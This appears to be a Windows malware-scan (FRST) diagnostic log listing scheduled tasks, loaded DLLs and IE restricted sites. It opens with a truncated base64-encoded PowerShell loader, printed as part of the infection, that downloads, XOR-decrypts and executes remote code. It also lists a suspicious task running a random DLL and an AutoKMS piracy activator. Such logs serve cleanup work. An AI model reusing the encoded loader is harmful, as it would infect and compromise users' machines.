AATABhAC0AawA3AGEAWAB3AEIAawAxAGEAbwBhAEkAbgB3AGMAZQBhAHAAbgA0AHIALQBsAGEAUQAzAHQAXwBZAEYASgBIAFkAUABpAEMAeQBPAC0AVQA1AEoAawB0AEsAeQBnAFcALQBXAG8AVQBuADIAaABQAG4ARgBhAEIAbQBXAFcAUQB3ADQAawBDAHIAegBGAFkANgBtAGsASwBJAE0AMQBJAGkARwBSAHoARgBhAGwANgBfAFcAdQBfAHYAbQA4AGgAaQByAE4ANQAxAEMAOQA2AHkAVwBUAE8AWABhAGwAZwBtADAATQBwAG4AUAAyAHAAUQBrAEIATwBPAFUATgBZADEAcQBBAFMATABxAC0AeQAzAE8ARwBzAHgAUgBNAEUARQBBAFcAVAB5ADMAQgA5AHcAeQB0AEwAOAA1AGkAawBKADkAcQA3AGUARAA2AGEAaABTAFgANgBQAFgAQwBlAEkAZABPAHUAVwBEAHQAUgB3AEUAcgBWAFAAbgBhAFIANgBSAC0AZABiAGcASwBTAFAAYgBJADEAZABoAGIAeABrAE8AcgBJADMAVABVAEMAaAB1AGQARQBBAE4AegA0AGUATwBxAG0ATwBXADAAUgBXADUAawAxAGQAdQBkAE0AcwAmAHIAPQA1ADIAOAA5ADkANQA5ADcANQA4ADAAMAA2ADAAOAAyADkANAAiADsAJABzAHQAcwBrAD0AIgB7ADAARgAwADUAMABCADQANwAtADcARQA3AEUALQA3AEQAMAA5AC0AMABCADEAMQAtADAARQAwAEMAMABCADcARQAxADEAMABCAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBUAFUATQBRAFYAUABXAEgAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {5517B568-4EBB-4F15-9F9A-E84A89A454B9} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2015-10-16] ()
Task: {6D7A0091-8CBF-48AB-88B7-55A3425FD4E7} - System32\Tasks\Uninstaller_SkipUac_User007 => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-10-30] (IObit)
Task: {7EF42BA1-FDD7-45D1-BCE9-843482238707} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {854C3809-9F5D-4131-8F6E-F522002F043B} - System32\Tasks\AdobeAAMUpdater-1.0-User007-PC-User007 => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {940C99A3-1544-4093-A104-14C125767399} - System32\Tasks\Opera scheduled Autoupdate 1397153165 => C:\Program Files (x86)\Opera\launcher.exe [2016-02-15] (Opera Software)
Task: {A65D8489-348C-41DE-AD4A-52823A9175C9} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-02-17] (AVAST Software)
Task: {AC2AFF81-E314-4ACB-BBDA-826554E8D48D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2015-12-29] (Microsoft Corporation)
Task: {B15FC61A-9132-4EC9-ADAD-F80C50FFB4AC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe [2012-03-02] ()
Task: {B9A91C40-DA9B-46EC-A749-0097A99023BB} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-12-04] (Microsoft Corporation)
Task: {C0619BA8-63CB-47F5-95D8-658A6C077390} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-12-04] (Microsoft Corporation)
Task: {CC01AC51-6B74-4752-B352-BD98D73E05CB} - System32\Tasks\{04CCF20E-46BC-F62D-B0EA-B4B28B43C23F} => /s /n /i:"/rt" "C:\PROGRA~3\f1a324cd\dd48c37a.dll"
Task: {D35891A9-2171-4C0C-B515-7B79D4807283} - System32\Tasks\ASC9_SkipUac_User007 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2015-11-10] (IObit)
Task: {E304B969-9B7C-416A-953C-19A073860234} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-12-03] (AVAST Software)
Task: {EA14E08B-685A-44EE-84AC-4D18FF2DE589} - System32\Tasks\Core Temp Autostart User007 => C:\Program Files\Core Temp\Core Temp.exe [2012-01-25] ()
Task: {EBDCF5C0-9EFB-455F-99C8-BA96040E6AC2} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-09-14] (Adobe Systems Incorporated)
Task: {EEE03E0C-DFDD-4ED1-AFBF-9AFA6479211C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {F545B93A-F441-4C8F-9D1B-D829CE4FD0E9} - System32\Tasks\SmartDefrag4_Update => C:\Program Files (x86)\IObit\Smart Defrag 4\AutoUpdate.exe [2015-08-21] (IObit)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-10-20 21:41 - 2015-11-24 19:40 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-12-29 10:08 - 2015-12-29 10:08 - 08903848 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2012-03-02 13:56 - 2012-02-17 20:55 - 00193536 _____ () C:\Program Files\WinRAR\rarext.dll
2012-02-28 09:58 - 2012-01-25 14:59 - 00848336 _____ () C:\Program Files\Core Temp\Core Temp.exe
2014-02-11 19:21 - 2014-02-11 19:21 - 00860160 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2014-02-11 19:22 - 2014-02-11 19:22 - 01043968 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2014-02-11 19:21 - 2014-02-11 19:21 - 00052736 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2014-02-11 19:22 - 2014-02-11 19:22 - 00236032 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2015-12-28 19:23 - 2015-12-04 03:52 - 00162472 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2013-02-14 18:40 - 2012-08-03 13:21 - 00132608 _____ () C:\Program Files\NetBalancer\PacketDotNet.dll
2013-01-27 15:55 - 2014-06-19 16:44 - 00214520 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2014-03-13 17:44 - 2015-11-04 17:44 - 00175080 _____ () C:\Program Files\TeamSpeak 3 Client\quazip.dll
2012-02-15 11:33 - 2015-11-04 17:44 - 00103400 _____ () C:\Program Files\TeamSpeak 3 Client\soundbackends\directsound_win64.dll
2012-02-15 11:33 - 2015-11-04 17:44 - 00108008 _____ () C:\Program Files\TeamSpeak 3 Client\soundbackends\windowsaudiosession_win64.dll
2012-02-15 11:33 - 2015-11-04 17:44 - 00312296 _____ () C:\Program Files\TeamSpeak 3 Client\plugins\clientquery_plugin.dll
2013-09-10 15:22 - 2015-11-04 17:44 - 00483816 _____ () C:\Program Files\TeamSpeak 3 Client\plugins\teamspeak_control_plugin.dll
2014-03-13 17:44 - 2015-09-24 15:13 - 00317440 _____ () C:\Program Files\TeamSpeak 3 Client\ssleay32.dll
2014-03-13 17:44 - 2015-09-24 15:13 - 01709056 _____ () C:\Program Files\TeamSpeak 3 Client\LIBEAY32.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00293024 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
2015-10-21 14:36 - 2016-02-19 15:26 - 05659216 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\engine2.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 00583328 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\tier0.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 00481440 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\vstdlib.dll
2015-10-21 14:36 - 2015-10-23 13:56 - 00978944 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\SDL2.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00474784 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\filesystem_stdio.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00639136 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\inputsystem.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 00264352 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\imemanager.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00218272 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\localize.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 01365152 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\rendersystemdx9.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00616608 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\resourcesystem.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 00701600 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\schemasystem.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00996512 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\materialsystem2.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00219296 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\valve_avi.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 06247072 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\scaleformui_4_dx9.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00891552 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\meshsystem.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 01248416 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\worldrenderer.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 00784032 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\vscript.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 02213536 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\networksystem.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 01367712 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\animationsystem.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 02012320 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\vphysics2.dll
2015-10-21 14:36 - 2016-02-19 15:26 - 01187408 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\soundsystem.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 02830496 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\scenesystem.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 01192096 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\vguirendersurface.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00512672 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\vgui2.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 02487456 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\panoramauiclient.dll
2015-10-21 14:36 - 2015-06-18 17:17 - 05981184 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\v8.dll
2015-10-21 14:36 - 2015-06-18 17:17 - 01795584 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\icui18n.dll
2015-10-21 14:36 - 2015-06-18 17:17 - 01414656 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\icuuc.dll
2015-10-21 14:36 - 2015-06-18 17:17 - 03166720 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\video64.dll
2015-10-21 14:36 - 2015-10-03 08:58 - 02926080 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\libavcodec-56.dll
2015-10-21 14:36 - 2015-10-03 08:58 - 00487936 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\libavutil-54.dll
2015-10-21 14:36 - 2015-10-03 08:58 - 00574976 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\libavformat-56.dll
2015-10-21 14:36 - 2015-10-03 08:58 - 00385024 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\libavresample-2.dll
2015-10-21 14:36 - 2015-10-03 08:58 - 00564736 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\libswscale-3.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 03172512 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\particles.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 03445920 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\panorama.dll
2015-10-29 21:18 - 2016-02-18 15:41 - 01458848 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\panorama_text_pango.dll
2015-10-21 14:36 - 2015-11-13 15:57 - 00481280 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\libfontconfig-1.dll
2015-10-21 14:36 - 2015-11-13 15:57 - 01058304 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\libfreetype-6.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00341664 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\renderingpipelines.dll
2015-10-21 14:38 - 2016-02-18 15:42 - 33734736 _____ () G:\Steam\steamapps\common\dota 2 beta\game\dota\bin\win64\server.dll
2015-10-21 14:38 - 2016-02-19 15:26 - 37170768 _____ () G:\Steam\steamapps\common\dota 2 beta\game\dota\bin\win64\client.dll
2015-10-21 14:36 - 2015-06-18 17:17 - 00137728 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\mss64mp3.asi
2015-10-21 14:36 - 2015-06-18 17:17 - 00071168 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\mss64ds3d.flt
2015-10-21 14:36 - 2015-06-18 17:17 - 00131584 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\mss64eax.flt
2015-10-21 14:38 - 2016-02-18 15:41 - 01502368 _____ () G:\Steam\steamapps\common\dota 2 beta\game\dota\bin\win64\host.dll
2015-10-21 14:36 - 2016-02-18 15:42 - 00276128 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\scenefilecache.dll
2015-10-21 14:36 - 2016-02-18 15:41 - 00525472 _____ () G:\Steam\steamapps\common\dota 2 beta\game\bin\win64\navsystem.dll
2015-12-03 15:41 - 2015-12-03 15:41 - 00103888 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2015-12-03 15:41 - 2015-12-03 15:41 - 00125512 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-02-19 15:26 - 2016-02-19 15:26 - 02835968 _____ () C:\Program Files\AVAST Software\Avast\defs\16021900\algo.dll
2015-12-03 15:41 - 2015-12-03 15:41 - 00469008 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2013-03-25 13:23 - 2016-02-10 02:17 - 00782336 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2014-12-03 15:47 - 2015-07-03 17:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2014-12-03 15:47 - 2015-07-03 17:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2014-12-03 15:47 - 2015-07-03 17:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2014-05-01 10:03 - 2016-02-19 00:21 - 02547792 _____ () C:\Program Files (x86)\Steam\video.dll
2014-08-22 13:55 - 2016-02-09 00:14 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-08-22 13:55 - 2016-02-09 00:14 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2014-08-22 13:55 - 2016-02-09 00:14 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-08-22 13:55 - 2016-02-09 00:14 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-08-22 13:55 - 2016-02-09 00:14 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2012-09-02 10:22 - 2016-02-19 00:21 - 00802896 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2016-02-19 15:26 - 2016-02-17 23:25 - 00281088 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2015-12-03 15:41 - 2015-12-03 15:42 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2012-09-02 10:22 - 2016-02-09 02:33 - 48400672 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2008-01-17 18:17 - 2008-01-17 18:17 - 00073782 _____ () C:\Program Files (x86)\Marvell\storage\Apache2\bin\zlib1.dll
2014-08-24 16:57 - 2014-05-13 11:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-08-24 16:57 - 2014-05-13 11:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2014-08-24 16:57 - 2014-05-13 11:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-08-24 16:57 - 2012-08-23 09:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2014-08-24 16:57 - 2012-04-03 16:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2016-01-01 18:08 - 2013-01-15 18:48 - 00348992 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
2016-01-01 18:08 - 2013-01-15 18:48 - 00183616 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
2016-01-01 18:08 - 2013-01-15 18:48 - 00051008 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
2014-08-15 08:59 - 2014-08-15 08:59 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\e1dca04e43d05aff13c672a916b3e8ef\IsdiInterop.ni.dll
2012-02-28 10:02 - 2011-05-20 10:05 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2016-02-17 15:24 - 2016-02-17 15:23 - 62327848 _____ () C:\Program Files (x86)\Opera\35.0.2066.68\opera.dll
2015-12-29 10:08 - 2015-12-29 10:08 - 08903848 _____ () C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2016-02-17 15:24 - 2016-02-17 15:23 - 02074664 _____ () C:\Program Files (x86)\Opera\35.0.2066.68\libglesv2.dll
2016-02-17 15:24 - 2016-02-17 15:23 - 00081960 _____ () C:\Program Files (x86)\Opera\35.0.2066.68\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 7751 more sites.

